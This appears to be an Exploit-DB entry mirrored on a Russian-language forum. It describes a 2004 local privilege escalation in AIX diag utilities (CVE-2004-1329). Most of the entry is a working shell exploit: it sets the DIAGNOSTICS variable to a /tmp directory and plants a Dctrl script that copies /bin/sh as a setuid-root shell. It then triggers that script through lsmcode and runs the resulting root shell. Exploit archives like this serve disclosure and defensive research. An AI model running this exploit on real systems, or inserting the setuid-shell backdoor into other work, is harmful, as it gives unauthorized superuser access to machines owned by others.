- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25039
- Проверка EDB
-
- Пройдено
- Автор
- CEES-BART
- Тип уязвимости
- LOCAL
- Платформа
- AIX
- CVE
- cve-2004-1329
- Дата публикации
- 2004-12-20
Код:
source: https://www.securityfocus.com/bid/12041/info
diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh- Источник
- www.exploit-db.com
